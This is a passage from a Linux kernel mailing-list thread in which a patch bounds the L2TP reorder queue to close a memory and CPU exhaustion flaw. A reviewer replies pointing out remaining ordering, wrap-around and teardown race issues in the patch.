can therefore fill the ordered reorder queue. Since insertion walks the
queue and expiration was checked only while receiving another packet,
this allowed unbounded memory and CPU use.

Reject duplicate sequence numbers and cap the reorder queue at 64
packets. Packets beyond the cap are discarded, except that the expected
sequence number is admitted so an in-order packet can drain the queue.
The existing timeout recovery then skips a missing sequence number when
the queue limit is reached.

Use a session timer to run the existing dequeue path at the head
expiration and shut it down before purging a session. This bounds the
queue and services expiration even when the peer stops sending.

Fixes: 3557baabf280 ("[L2TP]: PPP over L2TP driver core")
Cc: stable@vger.kernel.org
Reported-by: Vega <vega@nebusec.ai>
Assisted-by: LLM
Signed-off-by: Ruide Cao <caoruide123@gmail.com>
Signed-off-by: Ren Wei <weir@nebusec.ai>
---
 net/l2tp/l2tp_core.c | 57 +++++++++++++++++++++++++++++++++++++++++---
 net/l2tp/l2tp_core.h |  2 ++
 2 files changed, 56 insertions(+), 3 deletions(-)

diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
index f940914959b1..c92d4392f9b0 100644
--- a/net/l2tp/l2tp_core.c
+++ b/net/l2tp/l2tp_core.c
@@ -82,6 +82,7 @@
 #define L2TP_SL_SEQ_MASK   0x00ffffff
 
 #define L2TP_HDR_SIZE_MAX		14
+#define L2TP_REORDER_MAX_QUEUE	64
 
 /* Default trace flags */
 #define L2TP_DEFAULT_DEBUG_FLAGS	0
@@ -637,7 +638,22 @@ static void l2tp_recv_queue_skb(struct l2tp_session *session, struct sk_buff *sk
 	u32 ns = L2TP_SKB_CB(skb)->ns;
 
 	spin_lock_bh(&session->reorder_q.lock);
+	if (skb_queue_len(&session->reorder_q) >= L2TP_REORDER_MAX_QUEUE &&
+	    ns != session->nr) {
+		atomic_long_inc(&session->stats.rx_seq_discards);
+		atomic_long_inc(&session->stats.rx_errors);
+		kfree_skb(skb);
+		goto out;
+	}
+
 	skb_queue_walk_safe(&session->reorder_q, skbp, tmp) {
+		if (unlikely(L2TP_SKB_CB(skbp)->has_seq &&
+			     L2TP_SKB_CB(skbp)->ns == ns)) {
+			atomic_long_inc(&session->stats.rx_seq_discards);
+			atomic_long_inc(&session->stats.rx_errors);
+			kfree_skb(skb);
+			goto out;
+		}
 		if (L2TP_SKB_CB(skbp)->ns > ns) {
 			__skb_queue_before(&session->reorder_q, skbp, skb);
 			atomic_long_inc(&session->stats.rx_oos_packets);
@@ -651,6 +667,20 @@ static void l2tp_recv_queue_skb(struct l2tp_session *session, struct sk_buff *sk
 	spin_unlock_bh(&session->reorder_q.lock);
 }
 
+static bool l2tp_recv_queue_tail_skb(struct l2tp_session *session,
+				     struct sk_buff *skb)
+{
+	spin_lock_bh(&session->reorder_q.lock);
+	if (skb_queue_len(&session->reorder_q) >= L2TP_REORDER_MAX_QUEUE) {
+		spin_unlock_bh(&session->reorder_q.lock);
+		return false;
+	}
+	__skb_queue_tail(&session->reorder_q, skb);
+	spin_unlock_bh(&session->reorder_q.lock);
+
+	return true;
+}
+
 /* Dequeue a single skb.
  */
 static void l2tp_recv_dequeue_skb(struct l2tp_session *session, struct sk_buff *skb)
@@ -687,6 +717,7 @@ static void l2tp_recv_dequeue_skb(struct l2tp_session *session, struct sk_buff *
  */
 static void l2tp_recv_dequeue(struct l2tp_session *session)
 {
+	bool dequeued = false;
 	struct sk_buff *skb;
 	struct sk_buff *tmp;
 
@@ -706,6 +737,7 @@ static void l2tp_recv_dequeue(struct l2tp_session *session)
 			trace_session_pkt_expired(session, cb->ns);
 			session->reorder_skip = 1;
 			__skb_unlink(skb, &session->reorder_q);
+			dequeued = true;
 			kfree_skb(skb);
 			continue;
 		}
@@ -720,6 +752,7 @@ static void l2tp_recv_dequeue(struct l2tp_session *session)
 				goto out;
 		}
 		__skb_unlink(skb, &session->reorder_q);
+		dequeued = true;
 
 		/* Process the skb. We release the queue lock while we
 		 * do so to let other contexts process the queue.
@@ -730,9 +763,22 @@ static void l2tp_recv_dequeue(struct l2tp_session *session)
 	}
 
 out:
+	if (skb_queue_empty(&session->reorder_q))
+		timer_delete(&session->reorder_timer);
+	else if (dequeued || !timer_pending(&session->reorder_timer))
+		timer_reduce(&session->reorder_timer,
+			     L2TP_SKB_CB(skb_peek(&session->reorder_q))->expires);
 	spin_unlock_bh(&session->reorder_q.lock);
 }
 
+static void l2tp_recv_dequeue_timer(struct timer_list *timer)
+{
+	struct l2tp_session *session = timer_container_of(session, timer,
+							 reorder_timer);
+
+	l2tp_recv_dequeue(session);
+}
+
 static int l2tp_seq_check_rx_window(struct l2tp_session *session, u32 nr)
 {
 	u32 nws;
@@ -774,7 +820,8 @@ static int l2tp_recv_data_seq(struct l2tp_session *session, struct sk_buff *skb)
 	 * sequence number to re-enable packet reception.
 	 */
 	if (cb->ns == session->nr) {
-		skb_queue_tail(&session->reorder_q, skb);
+		if (!l2tp_recv_queue_tail_skb(session, skb))
+			goto discard;
 	} else {
 		u32 nr_oos = cb->ns;
 		u32 nr_next = (session->nr_oos + 1) & session->nr_max;
@@ -793,7 +840,8 @@ static int l2tp_recv_data_seq(struct l2tp_session *session, struct sk_buff *skb)
 			trace_session_pkt_oos(session, cb->ns);
 			goto discard;
 		}
-		skb_queue_tail(&session->reorder_q, skb);
+		if (!l2tp_recv_queue_tail_skb(session, skb))
+			goto discard;
 	}
 
 out:
@@ -986,7 +1034,8 @@ void l2tp_recv_common(struct l2tp_session *session, struct sk_buff *skb,
 		 * reorder queue. This ensures that it will be
 		 * delivered after all previous sequenced skbs.
 		 */
-		skb_queue_tail(&session->reorder_q, skb);
+		if (!l2tp_recv_queue_tail_skb(session, skb))
+			goto discard;
 	}
 
 	/* Try to dequeue as many skbs from reorder_q as we can. */
@@ -1748,6 +1797,7 @@ static void l2tp_session_del_work(struct work_struct *work)
 						    del_work);
 
 	l2tp_session_unhash(session);
+	timer_shutdown_sync(&session->reorder_timer);
 	l2tp_session_queue_purge(session);
 	if (session->session_close)
 		(*session->session_close)(session);
@@ -1804,6 +1854,7 @@ struct l2tp_session *l2tp_session_create(int priv_size, struct l2tp_tunnel *tunn
 			tunnel->tunnel_id, session->session_id);
 
 		skb_queue_head_init(&session->reorder_q);
+		timer_setup(&session->reorder_timer, l2tp_recv_dequeue_timer, 0);
 
 		session->hlist_key = l2tp_v3_session_hashkey(tunnel->sock, session->session_id);
 		INIT_HLIST_NODE(&session->hlist);
diff --git a/net/l2tp/l2tp_core.h b/net/l2tp/l2tp_core.h
index ffd8ced3a51f..6e4c1ef6a0a2 100644
--- a/net/l2tp/l2tp_core.h
+++ b/net/l2tp/l2tp_core.h
@@ -4,6 +4,7 @@
  * Copyright (c) 2008,2009 Katalix Systems Ltd
  */
 #include <linux/refcount.h>
+#include <linux/timer.h>
 
 #ifndef _L2TP_CORE_H_
 #define _L2TP_CORE_H_
@@ -80,6 +81,7 @@ struct l2tp_session {
 	u32			nr;		/* session NR state (receive) */
 	u32			ns;		/* session NR state (send) */
 	struct sk_buff_head	reorder_q;	/* receive reorder queue */
+	struct timer_list	reorder_timer;
 	u32			nr_max;		/* max NR. Depends on tunnel */
 	u32			nr_window_size;	/* NR window size */
 	u32			nr_oos;		/* NR of last OOS packet */
-- 
2.47.3


^ permalink raw reply related	[flat|nested] 3+ messages in thread

* Re: [PATCH net 1/1] l2tp: bound the reorder queue
  2026-09-24  0:32 ` [PATCH net 1/1] " Ren Wei
@ 2026-09-24  7:17   ` Eric Dumazet
  0 siblings, 0 replies; 3+ messages in thread
From: Eric Dumazet @ 2026-09-24  7:17 UTC (permalink / raw)
  To: Ren Wei
  Cc: netdev, davem, kuba, pabeni, horms, kees, kuniyu, alice.kernel,
	michael.bommarito, mail, jchapman, vega, caoruide123

On Thu, Sep 24, 2026 at 2:33 AM Ren Wei <weir@nebusec.ai> wrote:
>
> From: Ruide Cao <caoruide123@gmail.com>
>
> The receive-window check accepts every sequence number in the large
> window. If the peer omits the expected packet, distinct future packets
> can therefore fill the ordered reorder queue. Since insertion walks the
> queue and expiration was checked only while receiving another packet,
> this allowed unbounded memory and CPU use.
>
> Reject duplicate sequence numbers and cap the reorder queue at 64
> packets. Packets beyond the cap are discarded, except that the expected
> sequence number is admitted so an in-order packet can drain the queue.
> The existing timeout recovery then skips a missing sequence number when
> the queue limit is reached.
>
> Use a session timer to run the existing dequeue path at the head
> expiration and shut it down before purging a session. This bounds the
> queue and services expiration even when the peer stops sending.
>
> Fixes: 3557baabf280 ("[L2TP]: PPP over L2TP driver core")
> Cc: stable@vger.kernel.org
> Reported-by: Vega <vega@nebusec.ai>
> Assisted-by: LLM
> Signed-off-by: Ruide Cao <caoruide123@gmail.com>
> Signed-off-by: Ren Wei <weir@nebusec.ai>
> ---
>  net/l2tp/l2tp_core.c | 57 +++++++++++++++++++++++++++++++++++++++++---
>  net/l2tp/l2tp_core.h |  2 ++
>  2 files changed, 56 insertions(+), 3 deletions(-)
>
> diff --git a/net/l2tp/l2tp_core.c b/net/l2tp/l2tp_core.c
> index f940914959b1..c92d4392f9b0 100644
> --- a/net/l2tp/l2tp_core.c
> +++ b/net/l2tp/l2tp_core.c
> @@ -82,6 +82,7 @@
>  #define L2TP_SL_SEQ_MASK   0x00ffffff
>
>  #define L2TP_HDR_SIZE_MAX              14
> +#define L2TP_REORDER_MAX_QUEUE 64
>
>  /* Default trace flags */
>  #define L2TP_DEFAULT_DEBUG_FLAGS       0
> @@ -637,7 +638,22 @@ static void l2tp_recv_queue_skb(struct l2tp_session *session, struct sk_buff *sk
>         u32 ns = L2TP_SKB_CB(skb)->ns;
>
>         spin_lock_bh(&session->reorder_q.lock);
> +       if (skb_queue_len(&session->reorder_q) >= L2TP_REORDER_MAX_QUEUE &&
> +           ns != session->nr) {
> +               atomic_long_inc(&session->stats.rx_seq_discards);
> +               atomic_long_inc(&session->stats.rx_errors);
> +               kfree_skb(skb);
> +               goto out;
> +       }
> +
>         skb_queue_walk_safe(&session->reorder_q, skbp, tmp) {
> +               if (unlikely(L2TP_SKB_CB(skbp)->has_seq &&
> +                            L2TP_SKB_CB(skbp)->ns == ns)) {
> +                       atomic_long_inc(&session->stats.rx_seq_discards);
> +                       atomic_long_inc(&session->stats.rx_errors);
> +                       kfree_skb(skb);
> +                       goto out;
> +               }
>                 if (L2TP_SKB_CB(skbp)->ns > ns) {
>                         __skb_queue_before(&session->reorder_q, skbp, skb);
>                         atomic_long_inc(&session->stats.rx_oos_packets);

1) When a single packet is lost (ns == session->nr), all subsequent
   packets (nr + 1, nr + 2, ...) arrive in ascending order. Walking
   reorder_q from the head means every packet after a single drop walks
   the entire queue only to be appended at the tail.
   Walking backwards with skb_queue_reverse_walk_safe() (or checking
   skb_peek_tail() first) makes the common in-order-after-gap insertion
   O(1).

2) In the same loop:
   - L2TP_SKB_CB(skbp)->ns is only valid if L2TP_SKB_CB(skbp)->has_seq
     is set. Unsequenced packets can be queued to reorder_q in
     l2tp_recv_common() without initializing CB->ns. You guarded the
     equality check with has_seq, but not the '>' comparison right
     below it.
   - 'L2TP_SKB_CB(skbp)->ns > ns' does not handle sequence number
     wrap-around (16-bit for v2, 24-bit for v3). A modular comparison
     using session->nr_max / session->nr_window_size should be used
     here.

> @@ -651,6 +667,20 @@ static void l2tp_recv_queue_skb(struct l2tp_session *session, struct sk_buff *sk
>         spin_unlock_bh(&session->reorder_q.lock);
>  }
>
> +static bool l2tp_recv_queue_tail_skb(struct l2tp_session *session,
> +                                    struct sk_buff *skb)
> +{
> +       spin_lock_bh(&session->reorder_q.lock);
> +       if (skb_queue_len(&session->reorder_q) >= L2TP_REORDER_MAX_QUEUE) {
> +               spin_unlock_bh(&session->reorder_q.lock);
> +               return false;
> +       }
> +       __skb_queue_tail(&session->reorder_q, skb);
> +       spin_unlock_bh(&session->reorder_q.lock);
> +
> +       return true;
> +}
> +
>  /* Dequeue a single skb.
>   */
>  static void l2tp_recv_dequeue_skb(struct l2tp_session *session, struct sk_buff *skb)
> @@ -687,6 +717,7 @@ static void l2tp_recv_dequeue_skb(struct l2tp_session *session, struct sk_buff *
>   */
>  static void l2tp_recv_dequeue(struct l2tp_session *session)
>  {
> +       bool dequeued = false;
>         struct sk_buff *skb;
>         struct sk_buff *tmp;
>
> @@ -706,6 +737,7 @@ static void l2tp_recv_dequeue(struct l2tp_session *session)
>                         trace_session_pkt_expired(session, cb->ns);
>                         session->reorder_skip = 1;
>                         __skb_unlink(skb, &session->reorder_q);
> +                       dequeued = true;
>                         kfree_skb(skb);
>                         continue;
>                 }
> @@ -720,6 +752,7 @@ static void l2tp_recv_dequeue(struct l2tp_session *session)
>                                 goto out;
>                 }
>                 __skb_unlink(skb, &session->reorder_q);
> +               dequeued = true;
>
>                 /* Process the skb. We release the queue lock while we
>                  * do so to let other contexts process the queue.
> @@ -730,9 +763,22 @@ static void l2tp_recv_dequeue(struct l2tp_session *session)
>         }
>
>  out:
> +       if (skb_queue_empty(&session->reorder_q))
> +               timer_delete(&session->reorder_timer);
> +       else if (dequeued || !timer_pending(&session->reorder_timer))
> +               timer_reduce(&session->reorder_timer,
> +                            L2TP_SKB_CB(skb_peek(&session->reorder_q))->expires);
>         spin_unlock_bh(&session->reorder_q.lock);
>  }
>
> +static void l2tp_recv_dequeue_timer(struct timer_list *timer)
> +{
> +       struct l2tp_session *session = timer_container_of(session, timer,
> +                                                        reorder_timer);
> +
> +       l2tp_recv_dequeue(session);
> +}
> +
>  static int l2tp_seq_check_rx_window(struct l2tp_session *session, u32 nr)
>  {
>         u32 nws;
> @@ -774,7 +820,8 @@ static int l2tp_recv_data_seq(struct l2tp_session *session, struct sk_buff *skb)
>          * sequence number to re-enable packet reception.
>          */
>         if (cb->ns == session->nr) {
> -               skb_queue_tail(&session->reorder_q, skb);
> +               if (!l2tp_recv_queue_tail_skb(session, skb))
> +                       goto discard;
>         } else {
>                 u32 nr_oos = cb->ns;
>                 u32 nr_next = (session->nr_oos + 1) & session->nr_max;
> @@ -793,7 +840,8 @@ static int l2tp_recv_data_seq(struct l2tp_session *session, struct sk_buff *skb)
>                         trace_session_pkt_oos(session, cb->ns);
>                         goto discard;
>                 }
> -               skb_queue_tail(&session->reorder_q, skb);
> +               if (!l2tp_recv_queue_tail_skb(session, skb))
> +                       goto discard;
>         }
>
>  out:
> @@ -986,7 +1034,8 @@ void l2tp_recv_common(struct l2tp_session *session, struct sk_buff *skb,
>                  * reorder queue. This ensures that it will be
>                  * delivered after all previous sequenced skbs.
>                  */
> -               skb_queue_tail(&session->reorder_q, skb);
> +               if (!l2tp_recv_queue_tail_skb(session, skb))
> +                       goto discard;
>         }
>
>         /* Try to dequeue as many skbs from reorder_q as we can. */
> @@ -1748,6 +1797,7 @@ static void l2tp_session_del_work(struct work_struct *work)
>                                                     del_work);
>
>         l2tp_session_unhash(session);
> +       timer_shutdown_sync(&session->reorder_timer);
>         l2tp_session_queue_purge(session);

3) l2tp_session_unhash() does not wait for in-flight readers that
   already grabbed a session refcount via l2tp_session_get() before the
   unhash. Such a reader can enter l2tp_recv_common() after
   timer_shutdown_sync() and l2tp_session_queue_purge() have already
   run, queueing an skb onto reorder_q that will never be freed when
   session is kfree_rcu()'d in l2tp_session_free().
   Please either check session->dead under reorder_q.lock before
   queueing, or call l2tp_session_queue_purge() in l2tp_session_free()
   as well.

>         if (session->session_close)
>                 (*session->session_close)(session);
> @@ -1804,6 +1854,7 @@ struct l2tp_session *l2tp_session_create(int priv_size, struct l2tp_tunnel *tunn
>                         tunnel->tunnel_id, session->session_id);
>
>                 skb_queue_head_init(&session->reorder_q);
> +               timer_setup(&session->reorder_timer, l2tp_recv_dequeue_timer, 0);
>
>                 session->hlist_key = l2tp_v3_session_hashkey(tunnel->sock, session->session_id);
>                 INIT_HLIST_NODE(&session->hlist);
> diff --git a/net/l2tp/l2tp_core.h b/net/l2tp/l2tp_core.h
> index ffd8ced3a51f..6e4c1ef6a0a2 100644
> --- a/net/l2tp/l2tp_core.h
> +++ b/net/l2tp/l2tp_core.h
> @@ -4,6 +4,7 @@
>   * Copyright (c) 2008,2009 Katalix Systems Ltd
>   */
>  #include <linux/refcount.h>
> +#include <linux/timer.h>
>
>  #ifndef _L2TP_CORE_H_
>  #define _L2TP_CORE_H_
> @@ -80,6 +81,7 @@ struct l2tp_session {
>         u32                     nr;             /* session NR state (receive) */
>         u32                     ns;             /* session NR state (send) */
>         struct sk_buff_head     reorder_q;      /* receive reorder queue */
> +       struct timer_list       reorder_timer;
>         u32                     nr_max;         /* max NR. Depends on tunnel */
>         u32                     nr_window_size; /* NR window size */
>         u32                     nr_oos;         /* NR of last OOS packet */
> --
> 2.47.3
>

^ permalink raw reply	[flat|nested] 3+ messages in thread

end of thread, other threads:[~2026-09-24  7:17 UTC | newest]

Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-09-24  0:32 [PATCH net 0/1] l2tp: bound the reorder queue Ren Wei
2026-09-24  0:32 ` [PATCH net 1/1] " Ren Wei
2026-09-24  7:17   ` Eric Dumazet

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox